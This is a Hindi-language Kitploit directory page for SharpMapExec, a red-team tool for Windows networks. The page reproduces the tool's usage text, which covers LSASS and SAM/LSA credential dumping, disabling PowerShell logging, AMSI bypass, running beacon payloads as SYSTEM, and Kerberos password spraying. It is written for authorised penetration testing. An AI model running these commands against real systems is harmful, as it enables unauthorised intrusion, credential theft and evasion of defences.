Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharpMapExec — विंडोज-मूल पैठ परीक्षण स्विस आर्मी नाइफ, जिसका उपयोग लैटरल मूवमेंट, क्रेडेंशियल एक्सेस, डेटा एक्सफिल्ट्रेशन और CIM, SMB, WinRM, LDAP और डोमेन प्रोटोकॉल पर केरबेरोस/NTLM प्रमाणीकरण के साथ भेद्यता स्कैनिंग के लिए किया जाता है। | Kitploit
उपकरण/GitHubGitHub/cube0x0/sharpmapexec
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिटोहीपासवर्ड हमलेशोषणपार्श्व आंदोलनडेटा निष्कासनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
6711224 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubcube0x0/sharpmapexec

SharpMapExec

विंडोज-मूल पैठ परीक्षण स्विस आर्मी नाइफ, जिसका उपयोग लैटरल मूवमेंट, क्रेडेंशियल एक्सेस, डेटा एक्सफिल्ट्रेशन और CIM, SMB, WinRM, LDAP और डोमेन प्रोटोकॉल पर केरबेरोस/NTLM प्रमाणीकरण के साथ भेद्यता स्कैनिंग के लिए किया जाता है।

रिपॉजिटरी देखें

SharpMapExec

CrackMapExec का एक तेज़ संस्करण। यह टूल नेटवर्कों की पेनिट्रेशन टेस्टिंग को सरल बनाने और एक स्विस आर्मी नाइफ बनाने के लिए बनाया गया है जो विंडोज़ पर चलाने के लिए डिज़ाइन किया गया है, जो इनसाइडर थ्रेट सिमुलेशन अभियानों के दौरान अक्सर एक आवश्यकता होता है।

पहुँच की स्कैनिंग के अलावा, इसका उपयोग कमजोर कॉन्फ़िगरेशन की पहचान करने और डेटा निकालने (exfiltrate) के लिए किया जा सकता है। डेटा एक्सफ़िल्ट्रेशन मॉड्यूल का विचार रिमोट कंप्यूटर पर न्यूनतम आवश्यक कोड निष्पादित करना है। इसे पूरा करने के लिए, टूल सभी सीक्रेट्स को loot निर्देशिका में डाउनलोड करेगा और उन्हें स्थानीय रूप से पार्स करेगा।

आप यह निर्दिष्ट कर सकते हैं कि आप केरबरोस या NTLM प्रमाणीकरण का उपयोग करना चाहते हैं। यदि आप केरबरोस चुनते हैं, तो टूल एक बलिदान टोकन (sacrificial token) बनाएगा और टिकट आयात/माँगने के लिए Rubeus का उपयोग करेगा। यदि NTLM निर्दिष्ट है, तो टूल SetThreadToken या LogonUser प्रतिरूपण के लिए SharpKatz का उपयोग करेगा।

root@kitploit:~
SharpMapExec.exe
  usage:

    --- Cim ---
        Need plaintext password or the /impersonate flag
        SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET

       Available Cim modules
          /m:enable_winrm                             (Runs Enable-PSRemoting -Force)
          /m:disable_winrm                            (Runs Disable-PSRemoting -Force)
          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)
          /m:disable_pslogging                        (Modify registry to disable PowerShell Logging)
          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)
          /m:check_pslogging                          (Check PowerShell Logging registry)

    --- Reg32 ---
        SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
        SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       Reg32 modules
          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)
          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)
          /m:check_pslogging                          (Check PowerShell Logging registry)

    --- Smb ---
        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       Smb modules
          /m:shares                                   (Scan for accessible Smb shares)

    --- WinRm ---
        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       WinRm modules
          /m:exec /a:whoami                           (Invoke-Command)
          /m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)
          /m:comsvcs                                  (Dump & parse lsass)
          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)
          /m:assembly /p:Rubeus.exe /a:dump           (Execute local C# assembly in memory)
          /m:assembly /p:beacon.exe /system           (Execute local C# assembly as System in memory)
          /m:assembly /p:getMailBox.exe /delegwalk    (Execute local C# assembly in all unique delegation processes in memory)
          /m:download /path:C:\file /destination:file (Download file from host)
          /m:upload   /path:C:\file /destination:file (Upload file to host)

    --- Domain ---
        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
        SharpMapExec.exe tgtdeleg

    --- Ldap ---
        SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
        SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>

       Ldap modules
          /m:spraydata                                (Download user and password policy)

Smb

एडमिन एक्सेस, सुलभ Smb शेयरों, Smb संस्करण और रिले साइनिंग की स्कैनिंग के लिए उपयोग किया जा सकता है।

root@kitploit:~
/m:shares                                  (Scan enumerated shares for access)

WinRm

यह एक शक्तिशाली टूल है। इसमें बिल्ट-इन Amsi बाईपास, JEA भाषा ब्रेकआउट, JEA फंक्शन विश्लेषण शामिल है। इसका उपयोग कोड निष्पादन, PsRemote एक्सेस, कमजोर JEA एंडपॉइंट्स की स्कैनिंग और डेटा एक्सफ़िल्ट्रेशन के लिए किया जा सकता है।

root@kitploit:~
/m:exec /a:whoami                           (Invoke-Command)
/m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)
/m:comsvcs                                  (Dump Lsass Process)
/m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump           (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system           (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

Domain

वर्तमान में डोमेन पासवर्ड स्प्रेइंग और वर्तमान उपयोगकर्ता के लिए TGT बनाने का समर्थन करता है जिसका उपयोग /ticket पैरामीटर के साथ वर्तमान संदर्भ प्राप्त करने के लिए किया जा सकता है।

Ldap

PW स्प्रेइंग से पहले आवश्यक डेटा डाउनलोड करें

root@kitploit:~
/m:spraydata                                (Download user and password policy)

उपयोग का उदाहरण

C# असेंबलियों के आसान या बड़े पैमाने पर मेमोरी निष्पादन के लिए

केरबरोस पासवर्ड स्प्रेइंग के बाद स्थानीय एडमिन एक्सेस के लिए स्कैनिंग

यह प्रोजेक्ट JEA एंडपॉइंट्स की स्कैनिंग का समर्थन करता है और गैर-डिफ़ॉल्ट कमांड के स्रोत कोड का विश्लेषण करेगा तथा जाँच करेगा कि एंडपॉइंट no-language मोड के लिए कॉन्फ़िगर नहीं किया गया था।

NT हैश के साथ स्थानीय एडमिन पासवर्ड रीयूज़ की खोज करें

बिल्ट-इन Microsoft हस्ताक्षरित DLL के साथ बड़े पैमाने पर Lsass प्रक्रिया डंप करें और इसे loot फ़ोल्डर में सहेजें

उपयोगकर्ताओं द्वारा अद्वितीय सभी डेलिगेशन प्रक्रियाओं में निष्पादित होता है

SMB साइनिंग और SMBv1 के लिए स्कैन करें

और भी बहुत कुछ!

केरबरोस के साथ कुछ परिदृश्यों में आपको DC के साथ अपनी घड़ी को सिंक करना होगा और DNS सेट करना होगा

root@kitploit:~
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

स्वीकृतियाँ

वे प्रोजेक्ट जिन्होंने इस टूल में मदद की या मौजूद हैं

  • Rubeus @Harmj0y
  • SharpDPAPI @Harmj0y
  • SharpKatz @b4rtik
  • Amsi.Fail @Flangvik
  • SharpSecDump @G0ldenGunSec
  • CrackMapExec @byt3bl33d3r
  • Pingcastle @mysmartlogon
  • SharpSpray
टूल डाउनलोड करें